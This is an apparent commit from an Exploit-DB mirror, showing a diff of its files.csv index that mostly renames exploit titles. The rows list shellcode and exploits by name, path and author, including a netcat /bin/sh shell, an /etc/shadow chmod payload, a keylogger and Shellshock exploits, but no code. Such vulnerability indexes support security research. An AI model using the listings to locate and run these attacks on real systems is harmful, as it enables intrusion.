bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-05-10

Browse source 
11 new exploits

JITed egg-hunter stage-0 shellcode Adjusted universal for xp/vista/win7
JITed egg-hunter stage-0 shellcode Adjusted universal for XP/Vista/Windows 7

BlazeDVD 5.1- (.plf) Stack Buffer Overflow PoC Exploit - ALSR/DEP Bypass on Win7
BlazeDVD 5.1 - (.plf) Stack Buffer Overflow PoC Exploit (Windows 7 ALSR/DEP Bypass)

Winamp 5.572 - Local BoF Exploit (Win7 ASLR and DEP Bypass)
Winamp 5.572 - Local BoF Exploit (Windows 7 ASLR and DEP Bypass)

RM Downloader 3.1.3 - Local SEH Exploit (Win7 ASLR and DEP Bypass)
RM Downloader 3.1.3 - Local SEH Exploit (Windows 7 ASLR and DEP Bypass)

UFO: Alien Invasion 2.2.1 - BoF Exploit (Win7 ASLR and DEP Bypass)
UFO: Alien Invasion 2.2.1 - BoF Exploit (Windows 7 ASLR and DEP Bypass)

The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Win7 + ASLR Bypass)
The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Windows 7 + ASLR Bypass)

Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)
Mozilla Firefox 3.6.16 - mChannel Object Use After Free Exploit (Windows 7)

QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS
QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS
GNU Bash - Environment Variable Command Injection (ShellShock)
Bash - Environment Variables Code Injection Exploit (ShellShock)
GNU Bash - Environment Variable Command Injection (Shellshock)
Bash - Environment Variables Code Injection Exploit (Shellshock)

OpenVPN 2.2.29 - ShellShock Exploit
OpenVPN 2.2.29 - Shellshock Exploit

Bash - CGI RCE Shellshock Exploit (Metasploit)
Bash CGI - RCE Shellshock Exploit (Metasploit)

PHP 5.x (< 5.6.2) - Shellshock Exploit (Bypass disable_functions)
PHP 5.x (< 5.6.2) - Bypass disable_functions (Shellshock Exploit)

OSSEC 2.8 - Privilege Escalation
OSSEC 2.8 - hosts.deny Privilege Escalation

ShellShock dhclient Bash Environment Variable Command Injection PoC
dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock)

OSSEC 2.7 <= 2.8.1 - Local Root Escalation
OSSEC 2.7 <= 2.8.1 - _diff_ Command Local Root Escalation

Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) #2
Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2)

BigTree CMS Cross Site Request Forgery Vulnerability

Advantech Switch Bash Environment Variable Code Injection (Shellshock)
Advantech Switch - Bash Environment Variable Code Injection (Shellshock)
KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Wow64 Egghunter Win7)
KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10)
KiTTY Portable <= 0.65.0.2p - Local kitty.ini Overflow (Wow64 Egghunter Windows 7)
KiTTY Portable <= 0.65.0.2p - Local kitty.ini Overflow (Windows 8.1/Windows 10)

Windows Null-Free Shellcode - Primitive Keylogger to File - 431 (0x01AF) bytes
Ajaxel CMS 8.0 - Multiple Vulnerabilities
i.FTP 2.21 - Host Address / URL Field SEH Exploit
Dell SonicWall Scrutinizer <= 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution
ZeewaysCMS - Multiple Vulnerabilities
ASUS Memory Mapping Driver (ASMMAP/ASMMAP64): Physical Memory Read/Write
Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation
Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2)
RPCScan 2.03 - Hostname/IP Field SEH Overwrite PoC
ImageMagick Delegate Arbitrary Command Execution
Ruby on Rails Development Web Console (v2) Code Execution
This commit is contained in:
Offensive Security 2016-05-10 05:02:47 +00:00
parent 69f4286492
commit 01664c67b8
12 changed files with 1292 additions and 21 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

52
files.csv
View file

@ -12058,7 +12058,7 @@ id,file,description,date,author,platform,type,port
13645,platforms/windows/shellcode/13645.c,"JITed egg-hunter stage-0 shellcode",2010-03-20,"Alexey Sintsov",windows,shellcode,0
13647,platforms/windows/shellcode/13647.txt,"win32/xp sp3 (Ru) WinExec+ExitProcess cmd shellcode 12 bytes",2010-03-24,"lord Kelvin",windows,shellcode,0
13648,platforms/win32/shellcode/13648.rb,"Shellcode - Win32 MessageBox (Metasploit)",2010-03-24,corelanc0d3r,win32,shellcode,0
13649,platforms/windows/shellcode/13649.txt,"JITed egg-hunter stage-0 shellcode Adjusted universal for xp/vista/win7",2010-03-27,"Alexey Sintsov",windows,shellcode,0
13649,platforms/windows/shellcode/13649.txt,"JITed egg-hunter stage-0 shellcode Adjusted universal for XP/Vista/Windows 7",2010-03-27,"Alexey Sintsov",windows,shellcode,0
13661,platforms/linux/shellcode/13661.txt,"linux x86 - nc -lvve/bin/sh -p13377 shellcode",2010-04-02,anonymous,linux,shellcode,0
13669,platforms/linux/shellcode/13669.c,"chmod(_/etc/shadow__ 0666) shellcode (36 bytes)",2010-04-14,Magnefikko,linux,shellcode,0
13670,platforms/linux/shellcode/13670.c,"execve(_/bin/sh_) shellcode (25 bytes)",2010-04-14,Magnefikko,linux,shellcode,0
@ -12253,7 +12253,7 @@ id,file,description,date,author,platform,type,port
13902,platforms/asp/webapps/13902.txt,"Ananda Image Gallery SQL Vulnerability",2010-06-17,"L0rd CrusAd3r",asp,webapps,0
13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - (SEH) Exploit",2010-06-17,b0nd,windows,remote,0
13904,platforms/php/webapps/13904.txt,"Planet 1.1 - [CSRF] Add Admin Account",2010-06-17,G0D-F4Th3r,php,webapps,0
13905,platforms/windows/local/13905.py,"BlazeDVD 5.1- (.plf) Stack Buffer Overflow PoC Exploit - ALSR/DEP Bypass on Win7",2010-06-17,mr_me,windows,local,0
13905,platforms/windows/local/13905.py,"BlazeDVD 5.1 - (.plf) Stack Buffer Overflow PoC Exploit (Windows 7 ALSR/DEP Bypass)",2010-06-17,mr_me,windows,local,0
13906,platforms/novell/dos/13906.txt,"Netware SMB Remote Stack Overflow PoC",2010-06-17,"laurent gaffie",novell,dos,139
13907,platforms/windows/local/13907.py,"Winamp 5.572 - Local BoF Exploit (EIP & SEH DEP Bypass)",2010-06-17,TecR0c,windows,local,0
13908,platforms/lin_x86-64/shellcode/13908.c,"Linux/x86-64 - Disable ASLR Security - 143 bytes",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0
@ -12390,7 +12390,7 @@ id,file,description,date,author,platform,type,port
14062,platforms/php/webapps/14062.txt,"Joomla JE Event Calendar LFI Vulnerability",2010-06-26,Sid3^effects,php,webapps,0
14063,platforms/php/webapps/14063.txt,"Joomla JE Job Component com_jejob - LFI Vulnerability",2010-06-26,Sid3^effects,php,webapps,0
14064,platforms/php/webapps/14064.txt,"Joomla Component JE Section Finder LFI Vulnerability",2010-06-26,Sid3^effects,php,webapps,0
14068,platforms/windows/local/14068.py,"Winamp 5.572 - Local BoF Exploit (Win7 ASLR and DEP Bypass)",2010-06-26,Node,windows,local,0
14068,platforms/windows/local/14068.py,"Winamp 5.572 - Local BoF Exploit (Windows 7 ASLR and DEP Bypass)",2010-06-26,Node,windows,local,0
14073,platforms/php/webapps/14073.txt,"2daybiz Matrimonial Script smartresult.php SQL Injection Vulnerability",2010-06-27,"Easy Laster",php,webapps,0
14070,platforms/php/webapps/14070.txt,"Speedy 1.0 - Remote Shell Upload Vulnerability",2010-06-26,"ViRuS Qalaa",php,webapps,0
14071,platforms/windows/dos/14071.pl,"FoxPlayer 2 - (.m3u) Local BoF PoC",2010-06-26,Madjix,windows,dos,0
@ -12446,7 +12446,7 @@ id,file,description,date,author,platform,type,port
14146,platforms/hardware/webapps/14146.txt,"Ubiquity Nanostation5 (Air OS) - Remote Command Execution (0day)",2010-06-30,emgent,hardware,webapps,80
14147,platforms/php/webapps/14147.txt,"NinkoBB CSRF Vulnerability",2010-07-01,"ADEO Security",php,webapps,0
14149,platforms/asp/webapps/14149.txt,"Setiran CMS Blind SQL Injection Vulnerability",2010-07-01,"Th3 RDX",asp,webapps,0
14150,platforms/windows/local/14150.pl,"RM Downloader 3.1.3 - Local SEH Exploit (Win7 ASLR and DEP Bypass)",2010-07-01,Node,windows,local,0
14150,platforms/windows/local/14150.pl,"RM Downloader 3.1.3 - Local SEH Exploit (Windows 7 ASLR and DEP Bypass)",2010-07-01,Node,windows,local,0
14151,platforms/php/webapps/14151.pl,"Oxygen2PHP <= 1.1.3 (post.php) Blind SQL Injection Exploit",2010-07-01,Dante90,php,webapps,0
14152,platforms/php/webapps/14152.pl,"Oxygen2PHP <= 1.1.3 (forumdisplay.php) Blind SQL Injection Exploit",2010-07-01,Dante90,php,webapps,0
14153,platforms/windows/local/14153.pl,"Mediacoder 0.7.3.4682 - Universal Buffer Overflow (SEH)",2010-07-01,Madjix,windows,local,0
@ -12498,7 +12498,7 @@ id,file,description,date,author,platform,type,port
14206,platforms/php/webapps/14206.txt,"Esoftpro Online Contact Manager Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14207,platforms/php/webapps/14207.txt,"Joomla Phoca Gallery Component (com_phocagallery) SQL Injection Vulnerability",2010-07-04,RoAd_KiLlEr,php,webapps,0
14210,platforms/php/webapps/14210.txt,"Joomla Front-edit Address Book Component (com_addressbook) Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
14222,platforms/windows/remote/14222.py,"UFO: Alien Invasion 2.2.1 - BoF Exploit (Win7 ASLR and DEP Bypass)",2010-07-05,Node,windows,remote,0
14222,platforms/windows/remote/14222.py,"UFO: Alien Invasion 2.2.1 - BoF Exploit (Windows 7 ASLR and DEP Bypass)",2010-07-05,Node,windows,remote,0
14211,platforms/php/webapps/14211.txt,"Joomla NijnaMonials Component (com_ninjamonials) Blind SQL Injection Vulnerability",2010-07-04,Sid3^effects,php,webapps,0
14213,platforms/php/webapps/14213.txt,"Joomla Component Sef (com_sef) - LFI Vulnerability",2010-07-05,_mlk_,php,webapps,0
14214,platforms/php/webapps/14214.txt,"bbPress 1.0.2 - CSRF Change Admin Password",2010-07-05,saudi0hacker,php,webapps,0
@ -15112,7 +15112,7 @@ id,file,description,date,author,platform,type,port
17380,platforms/php/webapps/17380.txt,"Angora Guestbook 1.5 - Local File Inclusion",2011-06-10,"AutoSec Tools",php,webapps,0
17381,platforms/windows/remote/17381.txt,"simple web-server 1.2 - Directory Traversal",2011-06-10,"AutoSec Tools",windows,remote,0
17382,platforms/windows/webapps/17382.txt,"Tele Data Contact Management Server Directory Traversal",2011-06-10,"AutoSec Tools",windows,webapps,0
17383,platforms/windows/local/17383.py,"The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Win7 + ASLR Bypass)",2011-06-11,xsploitedsec,windows,local,0
17383,platforms/windows/local/17383.py,"The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Windows 7 + ASLR Bypass)",2011-06-11,xsploitedsec,windows,local,0
17456,platforms/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 - streamprocess.exe Buffer Overflow",2011-06-27,metasploit,windows,remote,0
17455,platforms/windows/dos/17455.rb,"Smallftpd 1.0.3 FTP Server Denial of Service Vulnerability",2011-06-27,"Myo Soe",windows,dos,0
17387,platforms/windows/dos/17387.html,"UUSEE ActiveX < 6.11.0412.1 - Buffer Overflow Vulnerability",2011-06-11,huimaozi,windows,dos,0
@ -15350,7 +15350,7 @@ id,file,description,date,author,platform,type,port
17664,platforms/windows/dos/17664.py,"NSHC Papyrus 2.0 - Heap Overflow Vulnerability",2011-08-13,wh1ant,windows,dos,0
17667,platforms/php/webapps/17667.php,"Contrexx Shopsystem <= 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,php,webapps,0
17669,platforms/windows/remote/17669.py,"Simple HTTPd 1.42 PUT Request Remote Buffer Overflow Vulnerability",2011-08-15,nion,windows,remote,0
17672,platforms/windows/remote/17672.html,"Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)",2011-08-16,mr_me,windows,remote,0
17672,platforms/windows/remote/17672.html,"Mozilla Firefox 3.6.16 - mChannel Object Use After Free Exploit (Windows 7)",2011-08-16,mr_me,windows,remote,0
17673,platforms/php/webapps/17673.txt,"WordPress IP-Logger Plugin <= 3.0 - SQL Injection Vulnerability",2011-08-16,"Miroslav Stampar",php,webapps,0
17674,platforms/php/webapps/17674.txt,"Joomla JoomTouch Component Local File Inclusion Vulnerability",2011-08-17,NoGe,php,webapps,0
17675,platforms/php/webapps/17675.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection Vulnerability",2011-08-17,v3n0m,php,webapps,0
@ -15755,7 +15755,7 @@ id,file,description,date,author,platform,type,port
18129,platforms/php/webapps/18129.txt,"Blogs manager <= 1.101 SQL Injection Vulnerability",2011-11-19,muuratsalo,php,webapps,0
18131,platforms/php/webapps/18131.txt,"ARASTAR - SQL Injection Vulnerability",2011-11-19,TH3_N3RD,php,webapps,0
18134,platforms/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8",2011-11-20,metasploit,windows,remote,0
18137,platforms/win32/local/18137.rb,"QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS",2011-11-21,hellok,win32,local,0
18137,platforms/win32/local/18137.rb,"QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS",2011-11-21,hellok,win32,local,0
18138,platforms/windows/remote/18138.txt,"VMware Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",windows,remote,0
18140,platforms/windows/dos/18140.c,"Winows 7 keylayout - Blue Screen Vulnerability",2011-11-21,instruder,windows,dos,0
18142,platforms/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - (WAV File) Stack Buffer Overflow",2011-11-22,metasploit,windows,local,0
@ -31330,8 +31330,8 @@ id,file,description,date,author,platform,type,port
34762,platforms/php/webapps/34762.txt,"WordPress Login Widget With Shortcode 3.1.1 - Multiple Vulnerabilities",2014-09-25,dxw,php,webapps,80
34763,platforms/php/webapps/34763.txt,"OsClass 3.4.1 (index.php file param) - Local File Inclusion",2014-09-25,Netsparker,php,webapps,80
34764,platforms/php/webapps/34764.txt,"Cart Engine 3.0 - Multiple Vulnerabilities",2014-09-25,"Quantum Leap",php,webapps,80
34765,platforms/linux/remote/34765.txt,"GNU Bash - Environment Variable Command Injection (ShellShock)",2014-09-25,"Stephane Chazelas",linux,remote,0
34766,platforms/linux/remote/34766.php,"Bash - Environment Variables Code Injection Exploit (ShellShock)",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80
34765,platforms/linux/remote/34765.txt,"GNU Bash - Environment Variable Command Injection (Shellshock)",2014-09-25,"Stephane Chazelas",linux,remote,0
34766,platforms/linux/remote/34766.php,"Bash - Environment Variables Code Injection Exploit (Shellshock)",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80
34767,platforms/windows/dos/34767.py,"BS.Player 2.56 - (.m3u / .pls) File Processing Multiple Remote Denial of Service Vulnerabilities",2010-09-26,modpr0be,windows,dos,0
34768,platforms/windows/remote/34768.c,"VirIT eXplorer 6.7.43 - 'tg-scan.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-09-27,anT!-Tr0J4n,windows,remote,0
34769,platforms/php/webapps/34769.txt,"MySITE SQL Injection and Cross-Site Scripting Vulnerabilities",2010-09-27,MustLive,php,webapps,0
@ -31430,7 +31430,7 @@ id,file,description,date,author,platform,type,port
34876,platforms/php/webapps/34876.txt,"E-Gold Game Series: Pirates of The Caribbean Multiple SQL Injection Vulnerabilities",2009-08-27,Moudi,php,webapps,0
34877,platforms/php/webapps/34877.txt,"DigiOz Guestbook 1.7.2 - 'search.php' Cross-Site Scripting Vulnerability",2009-08-26,Moudi,php,webapps,0
34878,platforms/php/webapps/34878.txt,"StandAloneArcade 1.1 - 'gamelist.php' Cross-Site Scripting Vulnerability",2009-08-27,Moudi,php,webapps,0
34879,platforms/linux/remote/34879.txt,"OpenVPN 2.2.29 - ShellShock Exploit",2014-10-04,"hobbily plunt",linux,remote,0
34879,platforms/linux/remote/34879.txt,"OpenVPN 2.2.29 - Shellshock Exploit",2014-10-04,"hobbily plunt",linux,remote,0
34881,platforms/linux/remote/34881.html,"Mozilla Firefox SeaMonkey <= 3.6.10 and Thunderbird <= 3.1.4 - 'document.write' Memory Corruption Vulnerability",2010-10-19,"Alexander Miller",linux,remote,0
34882,platforms/php/webapps/34882.html,"sNews 1.7 - 'snews.php' Cross-Site Scripting and HTML Injection Vulnerabilities",2010-10-19,"High-Tech Bridge SA",php,webapps,0
34883,platforms/php/webapps/34883.txt,"4Site CMS 2.6 - 'cat' Parameter SQL Injection Vulnerability",2010-10-19,"High-Tech Bridge SA",php,webapps,0
@ -31445,7 +31445,7 @@ id,file,description,date,author,platform,type,port
34892,platforms/php/webapps/34892.txt,"pecio CMS 2.0.5 - 'target' Parameter Cross-Site Scripting Vulnerability",2010-10-21,"Antu Sanadi",php,webapps,0
34893,platforms/php/webapps/34893.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter XSS",2009-07-20,"599eme Man",php,webapps,0
34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0
34895,platforms/cgi/webapps/34895.rb,"Bash - CGI RCE Shellshock Exploit (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0
34895,platforms/cgi/webapps/34895.rb,"Bash CGI - RCE Shellshock Exploit (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0
34896,platforms/linux/remote/34896.py,"Postfix SMTP - Shellshock Exploit",2014-10-06,"Phil Blank",linux,remote,0
34922,platforms/php/webapps/34922.txt,"Creative Contact Form - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0
35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injection Vulnerabilities",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0
@ -31678,7 +31678,7 @@ id,file,description,date,author,platform,type,port
35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection Vulnerability",2010-12-28,"non customers",php,webapps,0
35144,platforms/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 - Cross-Site Scripting Vulnerability",2010-12-23,"Gjoko Krstic",multiple,remote,0
35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' Parameter SQL Injection Vulnerability",2010-12-27,Dr.NeT,php,webapps,0
35146,platforms/php/webapps/35146.txt,"PHP 5.x (< 5.6.2) - Shellshock Exploit (Bypass disable_functions)",2014-11-03,"Ryan King (Starfall)",php,webapps,0
35146,platforms/php/webapps/35146.txt,"PHP 5.x (< 5.6.2) - Bypass disable_functions (Shellshock Exploit)",2014-11-03,"Ryan King (Starfall)",php,webapps,0
35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal Vulnerability",2010-12-24,anonymous,linux,remote,0
35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting Vulnerability",2010-12-27,"Ulisses Castro",php,webapps,0
35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443
@ -31755,7 +31755,7 @@ id,file,description,date,author,platform,type,port
35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System 2.9.2 - 'oid' Parameter SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0
35232,platforms/linux/remote/35232.txt,"Pango Font Parsing 'pangoft2-render.c' Heap Corruption Vulnerability",2011-01-18,"Dan Rosenberg",linux,remote,0
35233,platforms/multiple/webapps/35233.txt,"B-Cumulus 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0
35234,platforms/linux/local/35234.py,"OSSEC 2.8 - Privilege Escalation",2014-11-14,skynet-13,linux,local,0
35234,platforms/linux/local/35234.py,"OSSEC 2.8 - hosts.deny Privilege Escalation",2014-11-14,skynet-13,linux,local,0
35235,platforms/windows/local/35235.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",2014-11-14,metasploit,windows,local,0
35236,platforms/windows/local/35236.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution",2014-11-14,metasploit,windows,local,0
35237,platforms/multiple/webapps/35237.txt,"Gogs (label pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80
@ -33339,7 +33339,7 @@ id,file,description,date,author,platform,type,port
36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0
36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 and 4.1.1 - Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900
36933,platforms/linux/remote/36933.py,"ShellShock dhclient Bash Environment Variable Command Injection PoC",2014-09-29,fdiskyou,linux,remote,0
36933,platforms/linux/remote/36933.py,"dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock)",2014-09-29,fdiskyou,linux,remote,0
36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System listing.aspx searchText Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System /help/helpredir.aspx guide Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
36936,platforms/asp/webapps/36936.txt,"SAP Business Objects InfoView System /webi/webi_modify.aspx id Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
@ -33660,7 +33660,7 @@ id,file,description,date,author,platform,type,port
37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0
37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80
37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - CSRF Vulnerability",2015-06-10,"Nitin Venkatesh",php,webapps,80
37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - _diff_ Command Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
37267,platforms/windows/dos/37267.py,"foobar2000 1.3.8 (.m3u) Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
37292,platforms/linux/local/37292.c,"Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayfs Local Root (Shell)",2015-06-16,rebel,linux,local,0
@ -34565,7 +34565,7 @@ id,file,description,date,author,platform,type,port
38262,platforms/osx/dos/38262.txt,"OS X Regex Engine (TRE) - Integer Signedness and Overflow Issues",2015-09-22,"Google Security Research",osx,dos,0
38263,platforms/osx/dos/38263.txt,"OS X Regex Engine (TRE) - Stack Buffer Overflow",2015-09-22,"Google Security Research",osx,dos,0
38264,platforms/osx/dos/38264.txt,"Apple qlmanage - SceneKit::daeElement::setElementName Heap Overflow",2015-09-22,"Google Security Research",osx,dos,0
38265,platforms/win32/dos/38265.txt,"Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) #2",2015-09-22,"Nils Sommer",win32,dos,0
38265,platforms/win32/dos/38265.txt,"Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2)",2015-09-22,"Nils Sommer",win32,dos,0
38266,platforms/win32/dos/38266.txt,"Windows Kernel - DeferWindowPos Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win32,dos,0
38267,platforms/win32/dos/38267.txt,"Windows Kernel - UserCommitDesktopMemory Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win32,dos,0
38268,platforms/win32/dos/38268.txt,"Windows Kernel - Pool Buffer Overflow Drawing Caption Bar (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
@ -34969,7 +34969,6 @@ id,file,description,date,author,platform,type,port
38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field SEH Overflow",2015-11-12,"Nipun Jaswal",windows,dos,0
38688,platforms/php/webapps/38688.txt,"b374k Web Shell - CSRF Command Injection",2015-11-13,hyp3rlinx,php,webapps,0
38689,platforms/php/webapps/38689.txt,"SilverStripe 'MemberLoginForm.php' Information Disclosure Vulnerability",2013-08-01,"Fara Rustein",php,webapps,0
38690,platforms/php/webapps/38690.html,"BigTree CMS Cross Site Request Forgery Vulnerability",2013-07-17,"High-Tech Bridge",php,webapps,0
38691,platforms/cgi/webapps/38691.txt,"Kwok Information Server Multiple SQL Injection Vulnerabilities",2013-08-07,"Yogesh Phadtare",cgi,webapps,0
38692,platforms/hardware/remote/38692.txt,"AlgoSec Firewall Analyzer Cross Site Scripting Vulnerability",2013-08-16,"Asheesh kumar Mani Tripathi",hardware,remote,0
38693,platforms/php/webapps/38693.txt,"Advanced Guestbook 'addentry.php' Arbitrary Shell Upload Vulnerability",2013-08-08,"Ashiyane Digital Security Team",php,webapps,0
@ -35121,7 +35120,7 @@ id,file,description,date,author,platform,type,port
38846,platforms/multiple/remote/38846.txt,"nginx <= 1.1.17 URI Processing Security Bypass Vulnerability",2013-11-19,"Ivan Fratric",multiple,remote,0
38847,platforms/windows/local/38847.py,"Acunetix WVS 10 - Local Privilege Escalation",2015-12-02,"Daniele Linguaglossa",windows,local,0
38848,platforms/php/webapps/38848.php,"WordPress Suco Themes 'themify-ajax.php' Arbitrary File Upload Vulnerability",2013-11-20,DevilScreaM,php,webapps,0
38849,platforms/cgi/remote/38849.rb,"Advantech Switch Bash Environment Variable Code Injection (Shellshock)",2015-12-02,metasploit,cgi,remote,0
38849,platforms/cgi/remote/38849.rb,"Advantech Switch - Bash Environment Variable Code Injection (Shellshock)",2015-12-02,metasploit,cgi,remote,0
38850,platforms/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics Remote Code Injection Vulnerability",2013-11-22,"Eduardo Gonzalez",hardware,remote,0
38851,platforms/hardware/remote/38851.html,"LevelOne WBR-3406TX Router Cross Site Request Forgery Vulnerability",2013-11-15,"Yakir Wizman",hardware,remote,0
38852,platforms/php/webapps/38852.pl,"phpThumb 'phpThumb.php' Arbitrary File Upload Vulnerability",2013-12-01,DevilScreaM,php,webapps,0
@ -35380,8 +35379,8 @@ id,file,description,date,author,platform,type,port
39118,platforms/php/webapps/39118.html,"osCmax 2.5 Cross Site Request Forgery Vulnerability",2014-03-17,"TUNISIAN CYBER",php,webapps,0
39119,platforms/windows/remote/39119.py,"KiTTY Portable <= 0.65.0.2p - Chat Remote Buffer Overflow (SEH Windows XP/7/10)",2015-12-29,"Guillaume Kaddouch",windows,remote,0
39120,platforms/windows/local/39120.py,"KiTTY Portable <= 0.65.1.1p Local Saved Session Overflow (Egghunter XP_ DoS 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
39121,platforms/windows/local/39121.py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Wow64 Egghunter Win7)",2015-12-29,"Guillaume Kaddouch",windows,local,0
39122,platforms/windows/local/39122.py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
39121,platforms/windows/local/39121.py,"KiTTY Portable <= 0.65.0.2p - Local kitty.ini Overflow (Wow64 Egghunter Windows 7)",2015-12-29,"Guillaume Kaddouch",windows,local,0
39122,platforms/windows/local/39122.py,"KiTTY Portable <= 0.65.0.2p - Local kitty.ini Overflow (Windows 8.1/Windows 10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
39124,platforms/php/webapps/39124.txt,"MeiuPic 'ctl' Parameter Local File Include Vulnerability",2014-03-10,Dr.3v1l,php,webapps,0
39125,platforms/windows/dos/39125.html,"Kaspersky Internet Security Remote Denial of Service Vulnerability",2014-03-20,CXsecurity,windows,dos,0
39126,platforms/php/webapps/39126.txt,"BIGACE Web CMS 2.7.5 /public/index.php LANGUAGE Parameter Remote Path Traversal File Access",2014-03-19,"Hossein Hezami",php,webapps,0
@ -35946,6 +35945,7 @@ id,file,description,date,author,platform,type,port
39728,platforms/lin_x86-64/shellcode/39728.py,"Linux x64 - Bind Shell Shellcode Generator",2016-04-25,"Ajith Kp",lin_x86-64,shellcode,0
39729,platforms/win32/remote/39729.rb,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (MSF)",2016-04-25,"Jonathan Smith",win32,remote,21
39730,platforms/ruby/webapps/39730.txt,"NationBuilder Multiple Stored XSS Vulnerabilities",2016-04-25,LiquidWorm,ruby,webapps,443
39731,platforms/windows/shellcode/39731.c,"Windows Null-Free Shellcode - Primitive Keylogger to File - 431 (0x01AF) bytes",2016-04-25,Fugu,windows,shellcode,0
39733,platforms/linux/dos/39733.py,"Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC",2016-04-25,"David Silveiro",linux,dos,0
